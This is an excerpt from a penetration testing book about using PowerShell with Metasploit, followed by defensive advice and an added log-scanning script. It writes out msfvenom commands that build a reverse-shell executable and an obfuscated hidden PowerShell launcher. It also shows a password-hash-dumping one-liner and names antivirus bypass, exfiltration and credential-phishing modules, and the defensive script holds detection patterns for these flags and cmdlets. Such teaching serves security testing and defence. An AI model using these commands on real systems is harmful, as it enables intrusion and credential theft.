Weaponizing PowerShell with Metasploit and how to defend against PowerShell attacks [Tutorial]

4 min read, 04 Nov 2018

PowerShell is a powerful tool for performing sophisticated attacks, and it can also be used side by side with the Metasploit Framework.

This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.

In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.

Interactive PowerShell


Metasploit already ships modules that use PowerShell. You can list them with the search command:

msf> search powershell



Now it is time to learn how to use Metasploit with PowerShell. As one of its many uses, the msfvenom utility can wrap a PowerShell payload or a PowerShell command line into an executable file:

msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe

msfvenom -p windows/exec CMD="powershell -ep bypass -W Hidden -enc [Powershell script Here]" -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe

PowerSploit


PowerSploit is a well-known set of PowerShell scripts used by information security professionals, especially penetration testers. To download PowerSploit, grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:

# git clone https://github.com/PowerShellMafia/PowerSploit   


After cloning the project, use the ls command to list the files. As the screenshot shows, PowerSploit contains many useful scripts for performing a number of tasks, such as:

  • AntivirusBypass
  • Exfiltration
  • Persistence
  • PowerSploit
  • PowerUp
  • PowerView



Nishang – PowerShell for penetration testing


Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:

# git clone https://github.com/samratashok/nishang


As the listing of the downloaded project shows, Nishang is loaded with scripts and utilities for many of the tasks required during a penetration test, such as:

  • Privilege escalation
  • Scanning
  • Pivoting  


You can explore all the available scripts by listing the content of the Nishang project with the ls command.

Let's explore some of Nishang's scripts on a Windows machine.

You can import all the modules using the Import-Module PowerShell cmdlet:


Oops, something went wrong! Don't worry: in order to use Import-Module here, you need to open PowerShell as an administrator and type Set-ExecutionPolicy -ExecutionPolicy RemoteSigned.

Then you can import the modules:


Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information:


If you want to reveal the saved WLAN keys, type Get-WLAN-Keys.


You can go further and dump password hashes from a target machine during post-exploitation with the Get-PassHashes module. This is its output on my local machine:

If you want to run it as a single command after getting a shell, use:

Powershell.exe -exec bypass -Command "& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1'; Get-PassHashes}"


You can even present a credential-phishing prompt with Invoke-CredentialPhish, run in the same way as the previous demonstration on the victim's machine.

Defending against PowerShell attacks


In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:

  1. Implement the latest PowerShell version (version 5, when this book was written). To check, type Get-Host.
  2. Monitor PowerShell logs.
  3. Enforce a least-privilege policy and Group Policy settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker.
  4. Use Constrained Language mode:

PS C:\Windows\system32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')

  5. To check the Constrained Language mode, type:

$ExecutionContext.SessionState.LanguageMode

  6. That way, malicious scripts won't work.
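As an added example (not part of the book or this article), the following PowerShell script puts the "monitor PowerShell logs" step into practice: it enables Script Block Logging and hunts the resulting 4104 events for the launcher flags (-ep bypass, -W Hidden, -enc) and the Nishang cmdlet names used earlier in this tutorial. The sample script blocks and the base64 string are constructed, and the registry write needs an elevated PowerShell 5 session.

```powershell
# Added example, not from the book: enable Script Block Logging and scan the
# 4104 events for the launcher flags and Nishang cmdlets shown in this article.

# Detection patterns. -match is case-insensitive, so one form per flag is enough.
$patterns = @(
    '-e(p|xec|xecutionpolicy)\s+bypass'                # -ep bypass / -exec bypass
    '-w(indowstyle)?\s+hidden'                         # -W Hidden
    '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}'    # -enc <base64 script>
    'Get-PassHashes|Invoke-CredentialPhish'            # Nishang modules shown above
)

function Test-SuspiciousScriptBlock {
    param([string]$Text)
    # Returns the first matching pattern, or $null when the block looks benign.
    foreach ($p in $patterns) { if ($Text -match $p) { return $p } }
    return $null
}

# Constructed sample script blocks (not real captures); the base64 is just 'AAA...'.
$samples = @(
    ('powershell -ep bypass -W Hidden -enc ' + ('QUFB' * 12)),
    'Get-Service -Name WinRM | Restart-Service',
    'Import-Module .\Get-PassHashes.ps1; Get-PassHashes'
)
foreach ($s in $samples) {
    $label = if (Test-SuspiciousScriptBlock $s) { 'ALERT' } else { 'ok   ' }
    "$label  $($s.Substring(0, [Math]::Min(60, $s.Length)))"
}

# Enable Script Block Logging (the same registry value Group Policy writes).
$sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $sbl)) { New-Item -Path $sbl -Force | Out-Null }
Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

# Sweep the last 24 hours of 4104 events; Properties[2] holds the script text.
$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
             StartTime = (Get-Date).AddHours(-24) }
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
    $text = [string]$_.Properties[2].Value
    $hit  = Test-SuspiciousScriptBlock $text
    if ($hit) {
        $flat = $text -replace '\s+', ' '
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Pattern = $hit
            Snippet = $flat.Substring(0, [Math]::Min(100, $flat.Length))
        }
    }
}
```

Note that `__PSLockdownPolicy` is a machine-wide environment variable, so the LanguageMode check above only reports ConstrainedLanguage in a PowerShell session started after it was set. An enforced AppLocker or Windows Defender Application Control policy is the supported way to put PowerShell into Constrained Language mode for unapproved scripts.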

Thus, in this article, we saw the combination of Metasploit and PowerShell to perform more customized attacks and security tests. If you've enjoyed reading this post, and want to learn how to exploit enterprise VLANs, and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing.
